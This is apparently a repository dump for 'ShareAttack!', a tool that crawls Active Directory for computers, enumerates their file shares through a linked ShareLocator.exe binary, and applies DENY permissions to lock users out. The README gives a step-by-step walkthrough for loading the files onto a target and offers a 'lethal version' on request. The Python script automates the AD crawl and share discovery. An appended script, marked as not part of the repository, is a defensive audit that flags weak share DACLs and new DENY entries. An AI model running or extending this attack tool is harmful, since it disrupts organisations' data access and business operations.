├── LICENSE
├── README.md
├── ShareLocator.exe
└── shareAttack!.py


/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2017

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
## Disclaimer
I take no responsibility for your use of the software. Development is done in my personal capacity and carries no affiliation to my work.

# ShareAttack!
*Crawl any Windows network with Active Directory for computers and subsequently launch an attack on weak file permissions.*

__Usage__: Run ShareAttack!.py, ensure DSQUERY and SHARELOCATOR are included in the same root folder.

__Synopsis:__ This attack exploits weak file permissions allowing users to overwrite file permissions assigned to file shares.
Instead of exploiting file shares to gain access, the attack focuses on DENYING access to file shares. The attack uses the exploited account's credentials (an administrator account will be much more powerful).

__Files:__
* ShareAttack!.py (_main file to launch attack_)
* dsquery.exe (_standard DSQUERY to extract AD computers_) https://technet.microsoft.com/en-us/library/cc732952(v=ws.11).aspx
* sharelocator.exe (_Extract file shares from target server using srvsvc.NetShareEnumAll MSRPC function and then apply deny permissions (C++ please request source)_)

__Walkthrough:__
1. Load files onto target.
2. Execute ShareAttack!.py
3. Will automatically execute dsquery command to extract domain computers.
4. Test computers and retain active hosts.
5. Pass active computers onto ShareLocator.
6. ShareLocator will find all fileshares on target.
7. Attempt to apply DENY permission for each user with access.

__Requirements:__
* Windows computer environment, with AD for dsquery.
* Python 3.6 (feel free to port; reference GIT please).
* Weak file permissions :P

__Version:__ 0.1

__Parameters:__ *$crawl_limit*: set amount of computers to extract from AD, 0 extracts all.

__Alternatives [future to-do]:__
* ShareAttack!.py not required, can use only sharelocator.exe ```Sharelocator ```
* Replace DSQUERY with IP range or provide option to user at startup
* Port .py to Windows

__Note that the non-lethal version is uploaded, please msg to request the lethal version__


--------------------------------------------------------------------------------
/ShareLocator.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/InitRoot/shareAttack/098785e786b1966d3af5f1f57741f75e676b9d9c/ShareLocator.exe

--------------------------------------------------------------------------------
/shareAttack!.py:
--------------------------------------------------------------------------------
##Created by FransHBotes
##Usage:
##Synopsis: Use the attack for diversion, test response of security systems.
##          Several companies still make use of file drops and pickups to transfer data, when
##          access to the specified location is denied, business operations can be stalled.
##          Without knowing the network by heart this offers an easy attack method.
##Version: 0.1
##Parameters: $crawl_limit: set amount of computers to extract from AD, 0 extracts all.
##            Be prepared to wait when extracting all computers.
##
##
##IMPORTS##
import subprocess
import sys
import socket
import time
import signal
from timeit import default_timer as timer


##PARAMETERS##
crawl_limit = "15000"
ds_query = "dsquery * -filter (objectclass=computer) -attr dNSHostName -limit " + crawl_limit
domain_comps = []
active_comps = []
file_shares = {}
host_name = ''
port = 80
pingpassed = 0
pingfailed = 0
maxCount = 20

def main_function():
    ##INITIATE PROGRAM##
    try:
        print("ShareAttack! Launched")
        print("Gathering AD information....")
        signal.signal(signal.SIGINT, signal_handler)
        ##CRAWL ACTIVE DIRECTORY FOR ALL COMPUTERS##
        domain_comps = subprocess.check_output(ds_query,universal_newlines=True).splitlines()
        ##ONLY KEEP LIVE COMPUTERS##
        for comp in range(1, len(domain_comps)):
            host_name = domain_comps[comp]
            ping_host(host_name)
        print ("Active computers found!")
        print(active_comps)

        ##USE CUSTOM MADE SHARELOCATOR TO LOCATE THE FILESHARES FOR ALL THE COMPUTERS##
        print(".........")
        print("Launching ShareLocator")
        for acomp in range(0, len(active_comps)):
            activecomp = active_comps[acomp]
            print("ShareLocator " + activecomp)
            ShareLocator = "ShareLocator " + activecomp
            file_shares[activecomp] = subprocess.check_output(ShareLocator,universal_newlines=True).split(',')

        print("Shares Found!")
        print(file_shares)

    except subprocess.CalledProcessError:
        pass

#**********************************************************************#
def signal_handler(signal, frame):
    """ Catch Ctrl-C and Exit """
    sys.exit(0)


def ping_host(hostname):
    count = 0
    try:
        current_IP = socket.gethostbyname(hostname.strip())
        if current_IP != '':
            active_comps.append(current_IP)

    except socket.gaierror:
        pass

#**********************************************************************#
if __name__ == '__main__':
    main_function()

--------------------------------------------------------------------------------
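
A defensive audit for the condition the README describes, added here as an example and not part of this repository: it parses the DACL of shared-folder security descriptors in SDDL form, flags allow ACEs that let a broad, non-administrative trustee rewrite the DACL (the "weak file permissions"), and reports DENY ACEs that were not in a baseline snapshot. The function names, the server and share names and the SDDL strings are constructed for illustration, and it is assumed the snapshots were exported from the file server beforehand.

```python
import re

WRITE_DAC, GENERIC_ALL = 0x00040000, 0x10000000   # access-mask bits
REWRITE_TOKENS = {"FA", "GA", "WD"}   # SDDL rights: file-all, generic-all, write-DAC
# Broad, non-administrative trustees: Everyone, Authenticated Users, Users, Domain Users.
BROAD = {"WD", "AU", "BU", "DU", "S-1-1-0", "S-1-5-11", "S-1-5-32-545"}
DENY_TYPES = {"D", "OD"}   # conditional (callback) ACEs are not parsed here

def dacl_aces(sddl):
    """Return (type, rights, trustee) for every ACE in the DACL of an SDDL string."""
    m = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    if not m:
        return []
    fields = (body.split(";") for body in re.findall(r"\(([^()]*)\)", m.group(1)))
    return [(f[0], f[2], f[5]) for f in fields if len(f) >= 6]

def can_rewrite_dacl(rights):
    """True if the rights field (hex mask or two-letter tokens) allows changing the DACL."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & (WRITE_DAC | GENERIC_ALL))
    return bool({rights[i:i + 2] for i in range(0, len(rights), 2)} & REWRITE_TOKENS)

def audit(baseline, current):
    """Compare per-share SDDL snapshots; return (share, finding, trustee) tuples."""
    findings = []
    for share, sddl in sorted(current.items()):
        known = set(dacl_aces(baseline.get(share, "")))
        for ace in dacl_aces(sddl):
            ace_type, rights, trustee = ace
            if ace_type == "A" and trustee in BROAD and can_rewrite_dacl(rights):
                findings.append((share, "weak-dacl", trustee))
            if ace_type in DENY_TYPES and ace not in known:
                findings.append((share, "new-deny", trustee))
    return findings

# Constructed sample snapshots (hypothetical server and share names).
BASELINE = {
    r"\\fs01\drop": "O:BAG:DUD:PAI(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;0x1301bf;;;DU)",
    r"\\fs01\finance": "O:BAG:DUD:PAI(A;OICI;FA;;;BA)(A;OICI;FA;;;AU)",
}
CURRENT = dict(BASELINE)
CURRENT[r"\\fs01\drop"] = BASELINE[r"\\fs01\drop"].replace("PAI(", "PAI(D;OICI;FA;;;DU)(", 1)

if __name__ == "__main__":
    for finding in audit(BASELINE, CURRENT):
        print(finding)
```

A "weak-dacl" finding is the precondition to remove (replace Full Control with Modify for broad groups); a "new-deny" finding on a share is the effect the walkthrough's last step produces and is worth alerting on.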